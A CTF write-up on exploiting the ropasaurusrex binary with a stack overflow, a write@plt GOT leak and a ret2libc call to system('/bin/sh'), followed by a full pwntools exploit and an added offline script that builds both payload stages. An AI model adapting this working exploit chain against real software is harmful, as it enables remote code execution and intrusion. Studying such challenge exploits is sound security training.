GOT-01
OK, this one was quite an interesting exploit. It is again a GOT-based exploit, but a different variant, and it goes like this:
1.) Overflow the buffer until you reach the saved EIP.
2.) Call write() to leak a resolved GOT entry (write's own slot), so that we can compute the addresses of system() and "/bin/sh" in libc from known offsets. Calling through write@plt makes the dynamic linker resolve write before write() reads the slot, so the leak is the libc address and not the PLT stub.
3.) Return into the vulnerable function to trigger the overflow again, and now use a ret2libc attack :)
I used this to solve rop3 in picoCTF and ropasaurusrex.
from pwn import *

context(arch="i386", os="linux")

write_plt = 0x0804830c      # write@plt
vuln = 0x08048426           # vulnerable function, returned to for a second overflow
write_got = 0x08049614      # GOT slot holding write's resolved libc address
system_offset = 0x9e630     # write - system in the target libc
bin_offset = 0x85e4b        # "/bin/sh" - write in the target libc

# Stage 1: overflow the 140-byte frame, call write(1, &write@got, 4),
# then return into vuln() so we can overflow again with the leaked info.
payload = b"A" * 140 + p32(write_plt) + p32(vuln) + p32(1) + p32(write_got) + p32(4)

p = process("./ropasaurusrex")
p.sendline(payload)

leak = u32(p.recvn(4))      # recvn: wait for all 4 bytes of the leaked pointer
print("[+] Leaked address")
print(hex(leak))

# Stage 2: classic ret2libc, system("/bin/sh"); the return address after
# system() is junk, the shell is already running by then.
system = leak - system_offset
binaddr = leak + bin_offset
print("[+] Target address")
print(hex(system))
payload = b"A" * 140 + p32(system) + p32(0xdeadbeef) + p32(binaddr)
p.sendline(payload)
p.interactive()
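The same two-stage chain as an added example that is not part of the original writeup: it builds both payloads with plain struct.pack so the frame layout (callee, return address, arguments) can be checked offline, without pwntools or the target binary. The addresses and libc offsets are the ones quoted above; the function names (call_frame, leak_payload, resolve, ret2libc_payload), the assumed image range of the non-PIE binary used to reject an unresolved GOT entry, and the leaked bytes in demo() are my own constructions, not data from the page.

```python
# Added example, not the writeup's own script: builds the two-stage chain
# offline with struct.pack so the frame layout can be checked without
# pwntools or the target binary. Addresses and libc offsets are the ones the
# writeup quotes; the leaked bytes in demo() are constructed, not a real leak.
import struct

PAD = 140                   # bytes from the start of the buffer to the saved EIP
WRITE_PLT = 0x0804830c      # write@plt
VULN = 0x08048426           # vulnerable function, re-entered for stage 2
WRITE_GOT = 0x08049614      # GOT slot that holds write's libc address once resolved
SYSTEM_OFFSET = 0x9e630     # write - system in the target libc (from the writeup)
BINSH_OFFSET = 0x85e4b      # "/bin/sh" - write in the target libc (from the writeup)

# Assumed range of the non-PIE binary's own image (consistent with the
# 0x0804xxxx addresses above); a "leak" in here means the GOT slot still
# pointed at the PLT stub, i.e. the symbol was never resolved.
BINARY_RANGE = (0x08048000, 0x0804A000)


def p32(value):
    """Pack a 32-bit little-endian value, as pwntools' p32 would."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def call_frame(func, ret, *args):
    """Fake stack frame for a 32-bit cdecl call: callee, then the address the
    callee returns to, then its arguments (read from [esp+4...] on entry)."""
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)


def leak_payload(fd=1):
    """Stage 1: write(fd, &write@got, 4), then return into vuln() so the
    buffer can be overflowed a second time. Going through write@plt makes the
    dynamic linker resolve write first, so the slot is populated by the time
    write() reads it."""
    return b"A" * PAD + call_frame(WRITE_PLT, VULN, fd, WRITE_GOT, 4)


def resolve(leaked):
    """Turn the 4 leaked bytes into libc addresses using the known offsets."""
    if len(leaked) != 4:
        raise ValueError("expected exactly 4 leaked bytes, got %d" % len(leaked))
    write_addr = struct.unpack("<I", leaked)[0]
    if BINARY_RANGE[0] <= write_addr < BINARY_RANGE[1]:
        raise ValueError("leaked 0x%08x lies in the binary, GOT entry unresolved" % write_addr)
    return {
        "write": write_addr,
        "system": write_addr - SYSTEM_OFFSET,
        "binsh": write_addr + BINSH_OFFSET,
    }


def ret2libc_payload(system, binsh, ret_after=0xDEADBEEF):
    """Stage 2: system("/bin/sh"); ret_after is where system() would return,
    junk is fine since the shell is already spawned by then."""
    return b"A" * PAD + call_frame(system, ret_after, binsh)


def demo():
    """Walk both stages against a constructed leak (write at 0xb7f3b8e0)."""
    stage1 = leak_payload()
    fake_leak = p32(0xB7F3B8E0)          # constructed; a real run gets this from recv
    addrs = resolve(fake_leak)
    stage2 = ret2libc_payload(addrs["system"], addrs["binsh"])
    return stage1, addrs, stage2


if __name__ == "__main__":
    s1, addrs, s2 = demo()
    print("stage 1 (%d bytes): %s" % (len(s1), s1[PAD:].hex()))
    for name, addr in addrs.items():
        print("%-7s 0x%08x" % (name, addr))
    print("stage 2 (%d bytes): %s" % (len(s2), s2[PAD:].hex()))
```

Running it prints the 20 bytes after the padding for each stage, which is a quick way to confirm the order callee / return / args before sending anything at the real process; the resolve() check catches the classic mistake of leaking a slot that was never resolved, which on a lazily bound binary would hand back a 0x0804xxxx PLT address instead of a libc pointer.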